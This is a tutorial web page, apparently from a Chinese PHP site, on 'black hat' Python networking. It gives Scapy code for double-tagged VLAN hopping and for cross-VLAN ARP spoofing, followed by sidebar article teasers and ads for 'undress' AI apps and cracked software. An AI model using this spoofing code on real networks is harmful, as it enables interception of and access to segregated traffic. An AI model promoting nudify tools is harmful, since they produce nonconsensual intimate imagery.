VLAN (Virtual Local Area Network) is a virtual network built based on Ethernet interaction technology. It can not only divide the same physical network into multiple VALNs, but also cross physical network barriers and divide users in different subnets into in the same VLAN. Figure 2 is an example of VLAN division.
Figure 2
There are many ways to implement VLAN. There are generally two types of VLAN division based on switching equipment:
l Switch-based port division
l Based on IEEE 802.1q protocol, extended Ethernet frame format
Layer 2-based VLAN Technology, there is the concept of Trunking, which is used to connect different switches to ensure that members of the same VLAN established across multiple switches can communicate with each other. The ports used for interconnection between switches are called Trunk ports. In addition to 80.2.1q, Cisco has its own Trunk protocol called ISL.
Figure 3
Figure 3 is an 802.1q data packet, which is not essentially different from an ordinary Ethernet frame. Just add a VLAN Tag. The VLAN Identifier in the red part identifies which VLAN a data packet belongs to, thus ensuring that the range of data broadcast does not span VLANs.
Now let’s think about it briefly. If we want to communicate across VLANs, can we just modify the identifier in the data packet?
3.4.1 VLAN Hopping
Based on the above analysis, we consider a simple scenario: cross-VLAN ping, Send a ping request from a host in Vlan1 to a host in Vlan2.
Before specific coding, we still need to solve the problem of VLAN packet construction. In Scapy, we use the Dot1Q class to construct the Tag part in Figure 3. As shown in Figure 4.
Figure 4
Now we can write a cross-VLAN ping request.
#!/usr/bin/python from scapy.all import * packet = Ether(dst="c0:d3:de:ad:be:ef") / \ Dot1Q(vlan=1) / \ Dot1Q(vlan=2) / \ IP(dst="192.168.13.3") / \ ICMP() sendp(packet)
In the above code we specify the MAC and IP address of the target host, and add two VLAN identifiers, the first one is for sending data The VLAN where the host is located, and the second one is the VLAN where the target host is located. The switch will remove the first identifier, and when it reads the second identifier, it will forward the packet to the target host.
3.4.2 Cross-VLAN ARP spoofing
3.1, 3.2 and 3.3 We are all discussing the issue of ARP spoofing. Since VLAN limits the broadcast domain, our previous code cannot perform ARP spoofing across VLANs. However, it is very simple to solve this problem. We only need to insert the VLAN identifier into the ARP spoofing data we constructed previously. The following code is the code we used to construct the ARP request packet in Section 3.1.
def build_req(): if options.target is None: pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0]) elif options.target: target_mac = getmacbyip(options.target) if target_mac is None: print "[-] Error: Could not resolve targets MAC address" sys.exit(1) pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target) return pkt
In the part of constructing the data packet, we insert the VLAN identifier:
pkt = Ether(src=mac, dst=target_mac) /Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
In this way, cross-VLAN ARP spoofing can be achieved.
3.4.3 Summary
This section mainly talks about how to construct data packets that spoof VLAN to achieve cross-VLAN Data communication and ARP spoofing purposes. It should be noted that the method in this article mainly targets the 802.1Q protocol and has no effect on VLANs that are physically isolated by ports.
The above is the detailed explanation of Python black hat programming 3.4 across VLANs introduced by the editor. I hope it will be helpful to you. If you have any questions, please leave me a message and the editor will reply in time. Ours. I would also like to thank you all for your support of the PHP Chinese website!
For more Python black hat programming 3.4 cross-VLAN related articles, please pay attention to the PHP Chinese website!
How to Use Python to Find the Zipf Distribution of a Text FileMar 05, 2025 am 09:58 AMThis tutorial demonstrates how to use Python to process the statistical concept of Zipf's law and demonstrates the efficiency of Python's reading and sorting large text files when processing the law. You may be wondering what the term Zipf distribution means. To understand this term, we first need to define Zipf's law. Don't worry, I'll try to simplify the instructions. Zipf's Law Zipf's law simply means: in a large natural language corpus, the most frequently occurring words appear about twice as frequently as the second frequent words, three times as the third frequent words, four times as the fourth frequent words, and so on. Let's look at an example. If you look at the Brown corpus in American English, you will notice that the most frequent word is "th
How Do I Use Beautiful Soup to Parse HTML?Mar 10, 2025 pm 06:54 PMThis article explains how to use Beautiful Soup, a Python library, to parse HTML. It details common methods like find(), find_all(), select(), and get_text() for data extraction, handling of diverse HTML structures and errors, and alternatives (Sel
Mathematical Modules in Python: StatisticsMar 09, 2025 am 11:40 AMPython's statistics module provides powerful data statistical analysis capabilities to help us quickly understand the overall characteristics of data, such as biostatistics and business analysis. Instead of looking at data points one by one, just look at statistics such as mean or variance to discover trends and features in the original data that may be ignored, and compare large datasets more easily and effectively. This tutorial will explain how to calculate the mean and measure the degree of dispersion of the dataset. Unless otherwise stated, all functions in this module support the calculation of the mean() function instead of simply summing the average. Floating point numbers can also be used. import random import statistics from fracti
How to Perform Deep Learning with TensorFlow or PyTorch?Mar 10, 2025 pm 06:52 PMThis article compares TensorFlow and PyTorch for deep learning. It details the steps involved: data preparation, model building, training, evaluation, and deployment. Key differences between the frameworks, particularly regarding computational grap
Serialization and Deserialization of Python Objects: Part 1Mar 08, 2025 am 09:39 AMSerialization and deserialization of Python objects are key aspects of any non-trivial program. If you save something to a Python file, you do object serialization and deserialization if you read the configuration file, or if you respond to an HTTP request. In a sense, serialization and deserialization are the most boring things in the world. Who cares about all these formats and protocols? You want to persist or stream some Python objects and retrieve them in full at a later time. This is a great way to see the world on a conceptual level. However, on a practical level, the serialization scheme, format or protocol you choose may determine the speed, security, freedom of maintenance status, and other aspects of the program
What are some popular Python libraries and their uses?Mar 21, 2025 pm 06:46 PMThe article discusses popular Python libraries like NumPy, Pandas, Matplotlib, Scikit-learn, TensorFlow, Django, Flask, and Requests, detailing their uses in scientific computing, data analysis, visualization, machine learning, web development, and H
How to Create Command-Line Interfaces (CLIs) with Python?Mar 10, 2025 pm 06:48 PMThis article guides Python developers on building command-line interfaces (CLIs). It details using libraries like typer, click, and argparse, emphasizing input/output handling, and promoting user-friendly design patterns for improved CLI usability.
Scraping Webpages in Python With Beautiful Soup: Search and DOM ModificationMar 08, 2025 am 10:36 AMThis tutorial builds upon the previous introduction to Beautiful Soup, focusing on DOM manipulation beyond simple tree navigation. We'll explore efficient search methods and techniques for modifying HTML structure. One common DOM search method is ex
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function
Dreamweaver CS6
Visual web development tools
WebStorm Mac version
Useful JavaScript development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software
